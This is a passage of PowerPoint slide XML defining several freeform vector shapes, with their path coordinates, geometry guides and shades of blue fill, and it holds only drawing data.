                      <a:pt x="14" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10744" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1366" y="2239"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 0 h 104"/>
                  <a:gd name="T2" fmla="*/ 26 w 27"/>
                  <a:gd name="T3" fmla="*/ 1 h 104"/>
                  <a:gd name="T4" fmla="*/ 25 w 27"/>
                  <a:gd name="T5" fmla="*/ 4 h 104"/>
                  <a:gd name="T6" fmla="*/ 22 w 27"/>
                  <a:gd name="T7" fmla="*/ 10 h 104"/>
                  <a:gd name="T8" fmla="*/ 20 w 27"/>
                  <a:gd name="T9" fmla="*/ 19 h 104"/>
                  <a:gd name="T10" fmla="*/ 18 w 27"/>
                  <a:gd name="T11" fmla="*/ 32 h 104"/>
                  <a:gd name="T12" fmla="*/ 16 w 27"/>
                  <a:gd name="T13" fmla="*/ 49 h 104"/>
                  <a:gd name="T14" fmla="*/ 18 w 27"/>
                  <a:gd name="T15" fmla="*/ 74 h 104"/>
                  <a:gd name="T16" fmla="*/ 20 w 27"/>
                  <a:gd name="T17" fmla="*/ 104 h 104"/>
                  <a:gd name="T18" fmla="*/ 5 w 27"/>
                  <a:gd name="T19" fmla="*/ 104 h 104"/>
                  <a:gd name="T20" fmla="*/ 5 w 27"/>
                  <a:gd name="T21" fmla="*/ 101 h 104"/>
                  <a:gd name="T22" fmla="*/ 4 w 27"/>
                  <a:gd name="T23" fmla="*/ 92 h 104"/>
                  <a:gd name="T24" fmla="*/ 2 w 27"/>
                  <a:gd name="T25" fmla="*/ 80 h 104"/>
                  <a:gd name="T26" fmla="*/ 1 w 27"/>
                  <a:gd name="T27" fmla="*/ 64 h 104"/>
                  <a:gd name="T28" fmla="*/ 0 w 27"/>
                  <a:gd name="T29" fmla="*/ 47 h 104"/>
                  <a:gd name="T30" fmla="*/ 1 w 27"/>
                  <a:gd name="T31" fmla="*/ 31 h 104"/>
                  <a:gd name="T32" fmla="*/ 4 w 27"/>
                  <a:gd name="T33" fmla="*/ 14 h 104"/>
                  <a:gd name="T34" fmla="*/ 9 w 27"/>
                  <a:gd name="T35" fmla="*/ 0 h 104"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>
                  <a:gd name="T37" fmla="*/ 0 h 1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104"/>
                  <a:gd name="T59" fmla="*/ 27 w 27"/>
                  <a:gd name="T60" fmla="*/ 104 h 1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104">
                    <a:moveTo>
                      <a:pt x="27" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10745" name="Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2256"/>
                <a:ext cx="18" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 18"/>
                  <a:gd name="T1" fmla="*/ 2 h 81"/>
                  <a:gd name="T2" fmla="*/ 6 w 18"/>
                  <a:gd name="T3" fmla="*/ 3 h 81"/>
                  <a:gd name="T4" fmla="*/ 5 w 18"/>
                  <a:gd name="T5" fmla="*/ 8 h 81"/>
                  <a:gd name="T6" fmla="*/ 2 w 18"/>
                  <a:gd name="T7" fmla="*/ 15 h 81"/>
                  <a:gd name="T8" fmla="*/ 1 w 18"/>
                  <a:gd name="T9" fmla="*/ 25 h 81"/>
                  <a:gd name="T10" fmla="*/ 0 w 18"/>
                  <a:gd name="T11" fmla="*/ 37 h 81"/>
                  <a:gd name="T12" fmla="*/ 1 w 18"/>
                  <a:gd name="T13" fmla="*/ 50 h 81"/>
                  <a:gd name="T14" fmla="*/ 2 w 18"/>
                  <a:gd name="T15" fmla="*/ 65 h 81"/>
                  <a:gd name="T16" fmla="*/ 5 w 18"/>
                  <a:gd name="T17" fmla="*/ 81 h 81"/>
                  <a:gd name="T18" fmla="*/ 16 w 18"/>
                  <a:gd name="T19" fmla="*/ 80 h 81"/>
                  <a:gd name="T20" fmla="*/ 16 w 18"/>
                  <a:gd name="T21" fmla="*/ 78 h 81"/>
                  <a:gd name="T22" fmla="*/ 15 w 18"/>
                  <a:gd name="T23" fmla="*/ 72 h 81"/>
                  <a:gd name="T24" fmla="*/ 14 w 18"/>
                  <a:gd name="T25" fmla="*/ 61 h 81"/>
                  <a:gd name="T26" fmla="*/ 13 w 18"/>
                  <a:gd name="T27" fmla="*/ 50 h 81"/>
                  <a:gd name="T28" fmla="*/ 12 w 18"/>
                  <a:gd name="T29" fmla="*/ 37 h 81"/>
                  <a:gd name="T30" fmla="*/ 12 w 18"/>
                  <a:gd name="T31" fmla="*/ 24 h 81"/>
                  <a:gd name="T32" fmla="*/ 14 w 18"/>
                  <a:gd name="T33" fmla="*/ 11 h 81"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 1 h 81"/>
                  <a:gd name="T36" fmla="*/ 18 w 18"/>
                  <a:gd name="T37" fmla="*/ 1 h 81"/>
                  <a:gd name="T38" fmla="*/ 18 w 18"/>
                  <a:gd name="T39" fmla="*/ 1 h 81"/>
                  <a:gd name="T40" fmla="*/ 18 w 18"/>
                  <a:gd name="T41" fmla="*/ 1 h 81"/>
                  <a:gd name="T42" fmla="*/ 16 w 18"/>
                  <a:gd name="T43" fmla="*/ 0 h 81"/>
                  <a:gd name="T44" fmla="*/ 15 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 81"/>
                  <a:gd name="T46" fmla="*/ 13 w 18"/>
                  <a:gd name="T47" fmla="*/ 1 h 81"/>
                  <a:gd name="T48" fmla="*/ 9 w 18"/>
                  <a:gd name="T49" fmla="*/ 1 h 81"/>
                  <a:gd name="T50" fmla="*/ 6 w 18"/>
                  <a:gd name="T51" fmla="*/ 2 h 8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
                  <a:gd name="T79" fmla="*/ 0 h 81"/>
                  <a:gd name="T80" fmla="*/ 18 w 18"/>
                  <a:gd name="T81" fmla="*/ 81 h 8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 h="81">
                    <a:moveTo>
                      <a:pt x="6" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10746" name="Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1269" y="2261"/>
                <a:ext cx="14" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 14"/>
                  <a:gd name="T1" fmla="*/ 2 h 69"/>
                  <a:gd name="T2" fmla="*/ 5 w 14"/>
                  <a:gd name="T3" fmla="*/ 3 h 69"/>
                  <a:gd name="T4" fmla="*/ 4 w 14"/>
                  <a:gd name="T5" fmla="*/ 7 h 69"/>
                  <a:gd name="T6" fmla="*/ 3 w 14"/>
                  <a:gd name="T7" fmla="*/ 13 h 69"/>
                  <a:gd name="T8" fmla="*/ 1 w 14"/>
                  <a:gd name="T9" fmla="*/ 21 h 69"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 32 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 44 h 69"/>
                  <a:gd name="T14" fmla="*/ 1 w 14"/>
                  <a:gd name="T15" fmla="*/ 56 h 69"/>
                  <a:gd name="T16" fmla="*/ 4 w 14"/>
                  <a:gd name="T17" fmla="*/ 69 h 69"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 69 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 67 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 61 h 69"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 53 h 69"/>
                  <a:gd name="T26" fmla="*/ 11 w 14"/>
                  <a:gd name="T27" fmla="*/ 44 h 69"/>
                  <a:gd name="T28" fmla="*/ 10 w 14"/>
                  <a:gd name="T29" fmla="*/ 32 h 69"/>
                  <a:gd name="T30" fmla="*/ 10 w 14"/>
                  <a:gd name="T31" fmla="*/ 20 h 69"/>
                  <a:gd name="T32" fmla="*/ 12 w 14"/>
                  <a:gd name="T33" fmla="*/ 10 h 69"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 2 h 69"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 2 h 69"/>
                  <a:gd name="T38" fmla="*/ 14 w 14"/>
                  <a:gd name="T39" fmla="*/ 2 h 69"/>
                  <a:gd name="T40" fmla="*/ 14 w 14"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 14 w 14"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 13 w 14"/>
                  <a:gd name="T45" fmla="*/ 0 h 69"/>
                  <a:gd name="T46" fmla="*/ 11 w 14"/>
                  <a:gd name="T47" fmla="*/ 0 h 69"/>
                  <a:gd name="T48" fmla="*/ 8 w 14"/>
                  <a:gd name="T49" fmla="*/ 2 h 69"/>
                  <a:gd name="T50" fmla="*/ 5 w 14"/>
                  <a:gd name="T51" fmla="*/ 2 h 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
                  <a:gd name="T79" fmla="*/ 0 h 69"/>
                  <a:gd name="T80" fmla="*/ 14 w 14"/>
                  <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                    <a:moveTo>
                      <a:pt x="5" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10747" name="Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2267"/>
                <a:ext cx="12" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 12"/>
                  <a:gd name="T1" fmla="*/ 1 h 57"/>
                  <a:gd name="T2" fmla="*/ 3 w 12"/>
                  <a:gd name="T3" fmla="*/ 3 h 57"/>
                  <a:gd name="T4" fmla="*/ 3 w 12"/>
                  <a:gd name="T5" fmla="*/ 5 h 57"/>
                  <a:gd name="T6" fmla="*/ 2 w 12"/>
                  <a:gd name="T7" fmla="*/ 11 h 57"/>
                  <a:gd name="T8" fmla="*/ 0 w 12"/>
                  <a:gd name="T9" fmla="*/ 18 h 57"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 26 h 57"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 35 h 57"/>
                  <a:gd name="T14" fmla="*/ 2 w 12"/>
                  <a:gd name="T15" fmla="*/ 46 h 57"/>
                  <a:gd name="T16" fmla="*/ 3 w 12"/>
                  <a:gd name="T17" fmla="*/ 57 h 57"/>
                  <a:gd name="T18" fmla="*/ 11 w 12"/>
                  <a:gd name="T19" fmla="*/ 56 h 57"/>
                  <a:gd name="T20" fmla="*/ 11 w 12"/>
                  <a:gd name="T21" fmla="*/ 55 h 57"/>
                  <a:gd name="T22" fmla="*/ 10 w 12"/>
                  <a:gd name="T23" fmla="*/ 50 h 57"/>
                  <a:gd name="T24" fmla="*/ 10 w 12"/>
                  <a:gd name="T25" fmla="*/ 43 h 57"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 35 h 57"/>
                  <a:gd name="T28" fmla="*/ 7 w 12"/>
                  <a:gd name="T29" fmla="*/ 26 h 57"/>
                  <a:gd name="T30" fmla="*/ 9 w 12"/>
                  <a:gd name="T31" fmla="*/ 17 h 57"/>
                  <a:gd name="T32" fmla="*/ 10 w 12"/>
                  <a:gd name="T33" fmla="*/ 8 h 57"/>
                  <a:gd name="T34" fmla="*/ 12 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 57"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 0 h 57"/>
                  <a:gd name="T38" fmla="*/ 12 w 12"/>
                  <a:gd name="T39" fmla="*/ 0 h 57"/>
                  <a:gd name="T40" fmla="*/ 12 w 12"/>
                  <a:gd name="T41" fmla="*/ 0 h 57"/>
                  <a:gd name="T42" fmla="*/ 11 w 12"/>
                  <a:gd name="T43" fmla="*/ 0 h 57"/>
                  <a:gd name="T44" fmla="*/ 10 w 12"/>
                  <a:gd name="T45" fmla="*/ 0 h 57"/>
                  <a:gd name="T46" fmla="*/ 9 w 12"/>
                  <a:gd name="T47" fmla="*/ 0 h 57"/>
                  <a:gd name="T48" fmla="*/ 6 w 12"/>
                  <a:gd name="T49" fmla="*/ 0 h 57"/>
                  <a:gd name="T50" fmla="*/ 4 w 12"/>
                  <a:gd name="T51" fmla="*/ 1 h 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
                  <a:gd name="T79" fmla="*/ 0 h 57"/>
                  <a:gd name="T80" fmla="*/ 12 w 12"/>
                  <a:gd name="T81" fmla="*/ 57 h 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 h="57">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10748" name="Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2272"/>
                <a:ext cx="10" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 10"/>
                  <a:gd name="T1" fmla="*/ 1 h 45"/>
                  <a:gd name="T2" fmla="*/ 3 w 10"/>
                  <a:gd name="T3" fmla="*/ 2 h 45"/>
                  <a:gd name="T4" fmla="*/ 3 w 10"/>
                  <a:gd name="T5" fmla="*/ 5 h 45"/>
                  <a:gd name="T6" fmla="*/ 2 w 10"/>
                  <a:gd name="T7" fmla="*/ 9 h 45"/>
                  <a:gd name="T8" fmla="*/ 2 w 10"/>
                  <a:gd name="T9" fmla="*/ 14 h 45"/>
                  <a:gd name="T10" fmla="*/ 0 w 10"/>
                  <a:gd name="T11" fmla="*/ 21 h 45"/>
                  <a:gd name="T12" fmla="*/ 0 w 10"/>
                  <a:gd name="T13" fmla="*/ 28 h 45"/>
                  <a:gd name="T14" fmla="*/ 2 w 10"/>
                  <a:gd name="T15" fmla="*/ 37 h 45"/>
                  <a:gd name="T16" fmla="*/ 3 w 10"/>
                  <a:gd name="T17" fmla="*/ 45 h 45"/>
                  <a:gd name="T18" fmla="*/ 10 w 10"/>
                  <a:gd name="T19" fmla="*/ 45 h 45"/>
                  <a:gd name="T20" fmla="*/ 10 w 10"/>
                  <a:gd name="T21" fmla="*/ 44 h 45"/>
                  <a:gd name="T22" fmla="*/ 9 w 10"/>
                  <a:gd name="T23" fmla="*/ 41 h 45"/>
                  <a:gd name="T24" fmla="*/ 7 w 10"/>
                  <a:gd name="T25" fmla="*/ 35 h 45"/>
                  <a:gd name="T26" fmla="*/ 7 w 10"/>
                  <a:gd name="T27" fmla="*/ 28 h 45"/>
                  <a:gd name="T28" fmla="*/ 6 w 10"/>
                  <a:gd name="T29" fmla="*/ 21 h 45"/>
                  <a:gd name="T30" fmla="*/ 7 w 10"/>
                  <a:gd name="T31" fmla="*/ 14 h 45"/>
                  <a:gd name="T32" fmla="*/ 7 w 10"/>
                  <a:gd name="T33" fmla="*/ 7 h 45"/>
                  <a:gd name="T34" fmla="*/ 10 w 10"/>
                  <a:gd name="T35" fmla="*/ 1 h 45"/>
                  <a:gd name="T36" fmla="*/ 10 w 10"/>
                  <a:gd name="T37" fmla="*/ 1 h 45"/>
                  <a:gd name="T38" fmla="*/ 10 w 10"/>
                  <a:gd name="T39" fmla="*/ 1 h 45"/>
                  <a:gd name="T40" fmla="*/ 10 w 10"/>
                  <a:gd name="T41" fmla="*/ 1 h 45"/>
                  <a:gd name="T42" fmla="*/ 10 w 10"/>
                  <a:gd name="T43" fmla="*/ 0 h 45"/>
                  <a:gd name="T44" fmla="*/ 9 w 10"/>
                  <a:gd name="T45" fmla="*/ 0 h 45"/>
                  <a:gd name="T46" fmla="*/ 7 w 10"/>
                  <a:gd name="T47" fmla="*/ 1 h 45"/>
                  <a:gd name="T48" fmla="*/ 6 w 10"/>
                  <a:gd name="T49" fmla="*/ 1 h 45"/>
                  <a:gd name="T50" fmla="*/ 4 w 10"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 45"/>
                  <a:gd name="T80" fmla="*/ 10 w 10"/>
                  <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                    <a:moveTo>
                      <a:pt x="4" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A5EDFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10749" name="Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1272" y="2278"/>
